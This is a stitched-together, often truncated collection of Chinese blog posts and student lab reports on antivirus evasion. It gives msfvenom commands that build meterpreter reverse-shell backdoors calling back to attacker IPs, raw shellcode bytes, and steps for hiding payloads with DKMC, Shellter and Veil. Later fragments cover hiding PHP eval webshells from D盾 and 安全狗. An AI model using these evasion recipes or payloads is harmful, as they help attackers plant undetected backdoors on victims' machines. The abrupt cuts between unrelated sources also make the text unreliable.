免杀

*文章来源： https://blog.egsec.cn/archives/402 写在前面： 本片文章是写给社团中学习网络安全的同学的一点指导性文章，大家众所周知，我们学校并没有网络安全这门专业，所有的学习将是完全靠大家自学，社团建立网络安全战队就是为了力所能及的给大家提供最好的资源，帮助大家。本片文章内容只是我的个人观点，并不全面，本人也是一个刚入门的CTF练习生，所有的东西也是自学，并不全面，没有系统化学习过，更多资源还需靠自己查找。祝愿各位打算从事网安事业的同学加油！理论是枯燥的，但所有的实践需要理论去支撑！ 对于刚刚涉足安全界的同学来说，在没有老师带领的情况下，在如何学习网络安全上充满了迷茫，网络安全是一个综合性学科，涉及领域非常广，常指网络系统的硬件、软件及其系统中的数据受到保护，不因偶然的或者恶意的原因而遭受到破坏、更改、泄露，系统连续可靠正常地运行，网络服务不中断。 网络安全包含网络设备安全、网络信息安全、网络软件安全。从广义来说，凡是涉及到网络上信息的保密性、完整性、可用性、真实性和可控性的相关技术和理论都是网络安全的研究领域。网络安全是一门涉及计算机科学、网络技术、通信技术、密码技术、信息安全技术、应用数学、数论、信息论等多种学科的综合性学科。 这么多内容，对于一个刚入门的小白来说，刚开始摸不着头脑，所以，我根据自己的学习、工作以及实践经验列出了我的学习方法

今天整理以前的笔记，把这部分工具整理了一下，虽然没有白利用稳，但这些工具也能在一定程度起到一定的免杀作用。 DKMC 项目地址： https://github.com/Mr-Un1k0d3r/DKMC 可以创建一个 outputs 文件夹 存放 shellcode 启动 python dkmc.py 操作顺序： Sc ：是将 msf 生成的 raw 文件转换位 shellcode 代码 Gen ：是将其 msf 的 shellcode 注入到 BMP 图片中 Ps ：将其 BMP 的图片转换为 powershell 代码 Web ：将其开启 web 功能 第一步,先生成原始的 shellcode msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.88.174 lport=7777 -e x86/shikata_ga_nai -i 16 -f raw -o /root/DKMC/dk 第二步，生成 shellcode ，将生成的 shellcode 保存到文本里，exit 退出 \xdb\xc3\xb8\xa4\x85\xc1\x7d\xd9\x74\x24\xf4\x5e\x31\xc9\xb1\xbb\x83\xee\xfc\x31\x46\x15\x03\x46\x15\x46\x70\x7f\xa8\x6b

一、实验要求： 1. 实践内容（3.5分） 1.1 正确使用msf编码器（0.5分），msfvenom生成如jar之类的其他文件（0.5分），veil-evasion（0.5分），加壳工具（0.5分），使用shellcode编程（1分） 1.2 通过组合应用各种技术实现恶意代码免杀(0.5分) （如果成功实现了免杀的，简单语言描述原理，不要截图。与杀软共生的结果验证要截图。） 1.3 用另一电脑实测，在杀软开启的情况下，可运行并回连成功，注明电脑的杀软名称与版本（加分0.5） 2 报告内容： 2.1.基础问题回答 （1）杀软是如何检测出恶意代码的？ （2）免杀是做什么？ （3）免杀的基本方法有哪些？ 2.2.实践总结与体会 2.3.开启杀软能绝对防止电脑中恶意代码吗？ 2.4.实践过程记录 3.报告评分 1分 3.1 报告整体观感 0.5分 3.1.1 报告格式范围，版面整洁 加0.5。 3.1.2 报告排版混乱，加0分。 3.2 文字表述 0.5分 3.2.1报告逻辑清楚，比较简要地介绍了自己的操作目标与过程 加0.5分。 3.2.2报告逻辑混乱表述不清或文字有明显抄袭可能 加0分 二、免杀基础问题回答： 1、杀毒软件是如何检测出恶意代码的？ 是基于特征码的检测（杀软的特征库中包含了一些数据或者数据段，杀软会尽可能的更新这个特征库，以包括尽可能多的恶意代码，当一个可执行文件

1实验要求 1.1 正确使用msf编码器（0.5分），msfvenom生成如jar之类的其他文件（0.5分），veil-evasion（0.5分），加壳工具（0.5分），使用shellcode编程（1分） 1.2 通过组合应用各种技术实现恶意代码免杀(0.5分) （如果成功实现了免杀的，简单语言描述原理，不要截图。与杀软共生的结果验证要截图。 1.3 用另一电脑实测，在杀软开启的情况下，可运行并回连成功，注明电脑的杀软名称与版本（加分0.5） 2实验步骤 检测工具： https://www.virustotal.com/ http://www.virscan.org/ 首先使用VirusTotal或Virscan这两个网站对上次实验生成的后门程序进行扫描。 virustotal virscan 2.1任务一 2.1.1正确使用msf编码器，生成exe文件 使用msf编码器对后门程序进行一次到多次的编码，并进行检测。 一次编码命令： mfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' LHOST=192.168.183.130 LPORT=4308 -f exe > met-encoded.exe 利用之前实验所学，将生成的met-encoded

今天所学的知识一共有以下几点： ms08-067漏洞复现 ms10-046漏洞复现 木马免杀 前面几个漏洞复现就不详细说了，跟着步骤操作基本可以成功，主要说一下今天做的简单木马免杀，下面进入正题。 木马免杀 Shellter是一个开源的免杀工具，利用动态Shellcode注入来实现免杀的效果，我是使用的shellter免杀，做的不是很好，跟大家分享一下我的实验结果。 原理： 生成木马文件，然后将生成的木马文件与**shellter免杀工具**捆绑，然后设置监听，将捆绑后的文件拷贝到WinXP系统中，双击后，发现攻击成功，最后将该文件在腾讯哈勃分析系统上分析。 实验环境 ： Kali系统 ip地址为: 192.168.159.128 步骤： * 在Kali生成一个hacker.exe的木马文件。命令为：msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.159.128 lport=4321 -f exe > /root/hacker.exe * 下载安装shellter免杀工具，切换到shellter文件夹下,执行shellter工具。（注意:直接执行shellter工具会不成功，因为Kali系统不支持运行.exe文件，所以我们需要安装使用wine模拟Windows系统打开.exe文件。） *

使用msf编码器生成jar包 使用指令：msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.157.141 lport=5234 x> 5234_backjar.jar 上传扫描的结果： 结果还行 使用veil-evasion生成反弹链接的可执行文件： 下载安装好veil之后，进入veil生成 回连成功： 扫描结果： 利用shellcode编程等免杀工具或技巧 生成Shellcode： \x7f\x6b\x1\x83\x83\x83\xe3\xa\x66\xb2\x43\xe7\x8\xd3\xb3\x8\xd1\x8f\x8\xd1\x97\x8\xf1\xab\x8c\x34\xc9\xa5\xb2\x7c\x2f\xbf\xe2\xff\x81\xaf\xa3\x42\x4c\x8e\x82\x44\x61\x71\xd1\xd4\x8\xd1\x93\x8\xc9\xbf\x8\xcf\x92\xfb\x60\xcb\x82\x52\xd2\x8\xda\xa3\x82\x50\x8\xca\x9b\x60\xb9\xca\x8\xb7\x8\x82\x55\xb2\x7c\x2f\x42\x4c\x8e\x82\x44\xbb\x63\xf6\x75\x80\xfe\x7b\xb8\xfe\xa7\xf6\x67

严格的D盾 D盾说，我是个严格的人，看到eval我就报木马，“看着像“=”就是“木马，宁可错杀一千，绝不放过一个。好了，多说无益，一起看看严格的D盾是如何错杀的。 我随手写一个php文件：代码如下： <?php function encode($para0){ return $para0; } $b = encode("aaaa"); $a = "ccc"; eval($a); ?> 很明显没有传参呀，GET和POST都没有，压根儿就不是木马的，但是D盾竟然给我直接报了已知后门，我哭辽，如下： 大家最初的绕过应该大多都是基于”assert”的拆分和隐藏绕过的，但是在php7.1后assert已经被移除了，那么我们这些渗透测试er该何去何从呢？，能否找到新的技巧呢？当然，技巧千千万，找一些少见的函数，少见的特殊字符都是不错的选择。但是我们能否借助在php7.1之前的隐藏和拆分”assert“的思路呢？答案是肯定的，我们可以尝试隐藏和拆分传入eval中的参数来直面eval函数绕过。 隐藏POST和GET 在php7.1之后，如果我们转换思路，不再纠结于隐藏assert，eval等命令执行函数(因为assert已经失效，也无法隐藏了，无需隐藏了)，而是直接面对eval，在我上述的例子中大家很容易看到，我就随便往eval中传了一个参数“ccc”，D盾就直接报已知后门了

隶属于 360 公司信息安全中心，我们深谙“未知攻，焉知防”，团队成员专注于各类漏洞利用研究，在红蓝对抗、区块链安全、代码审计拥有多年资深经验。 author：boi@360RedTeam 由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，文章作者不为此承担任何责任。 0x00 序 在Redteam参与企业安全建设或者红蓝对抗的情况下，我们可能需要利用一些可执行文件来完成既定任务。而随着企业对网络安全主机安全重视程度的提高，目标主机上通常存在一些终端防护软件，为了保证任务能够顺利进行，我们需要对可执行文件进行免杀操作。本篇文章是自己在免杀学习的一些记录，主要着重于基础，通过分析Cobaltstrike Kit中使用的命名管道技术引出几个绕过思路，希望借此抛砖引玉、以攻促防，同时希望能够引起红蓝双方的重视。 毕竟，自己动手，丰衣足食。 0x01 知己知彼 目前的反病毒安全软件，常见有三种，一种基于特征，一种基于行为，一种基于云查杀。云查杀的特点基本也可以概括为特征查杀。 对特征来讲，大多数杀毒软件会定义一个阈值，当文件内部的特征数量达到一定程度就会触发报警，也不排除杀软会针对某个EXP会限制特定的入口函数来查杀。当然还有通过md5，sha1等hash函数来识别恶意软件，这也是最简单粗暴，最容易绕过的。 针对特征的免杀较为好做，可以使用加壳改壳

一个很好的学习网站 推荐一下: https://docs.microsoft.com/zh-cn/windows/win32/api/ 0x01 VirtualAlloc VirtualAlloc: 在虚拟地址空间中预定一块内存区域； VirtualAlloc是Windows提供的API，通常用来分配大块的内存。 PVOID VirtualAlloc(PVOID pvAddress, SIZE_T dwSize, DWORD fdwAllocationType, DWORD fdwProtect) VirtualAlloc (PVOID 开始地址，SIZE_T 大小，DWORD 类型，DWORD 保护属性) VirtualQuery SIZE_T WINAPI VirtualQuery( _In_opt_ LPCVOID lpAddress, _Out_ PMEMORY_BASIC_INFORMATION lpBuffer, _In_ SIZE_T dwLength ); MEMORY_BASIC_INFORMATION结构 包含有关进程的虚拟地址空间中的页面范围的信息。该 VirtualQuery来和 VirtualQueryEx函数使用这种结构。 句法 typedef struct _MEMORY_BASIC_INFORMATION { PVOID BaseAddress;

转自： https://www.cnblogs.com/-qing-/p/10631414.html 0x03 关于eval 于 assert # 关于eval函数在php给出的官方说明是 eval 是一个语言构造器而不是一个函数，不能被 可变函数 调用 可变函数：通过一个变量，获取其对应的变量值，然后通过给该值增加一个括号()，让系统认为该值是一个函数，从而当做函数来执行 通俗的说比如你 <?php $a=eval;$a() ?> 这样是不行的 也造就了用eval的话达不到assert的灵活，但是在php7.1以上assert已经不行 关于assert函数 assert() 回调函数在构建自动测试套件的时候尤其有用，因为它们允许你简易地捕获传入断言的代码，并包含断言的位置信息。 当信息能够被其他方法捕获，使用断言可以让它更快更方便！ 0x04 字符串变形 # 字符串变形多数用于BYPASS安全狗，相当对于D盾，安全狗更加重视"形" 一个特殊的变形就能绕过安全狗，看看PHP手册，有着很多关于操作字符串的函数 ucwords() //函数把字符串中每个单词的首字符转换为大写。ucfirst() //函数把字符串中的首字符转换为大写。trim() //函数从字符串的两端删除空白字符和其他预定义字符。substr_replace() //函数把字符串的一部分替换为另一个字符串substr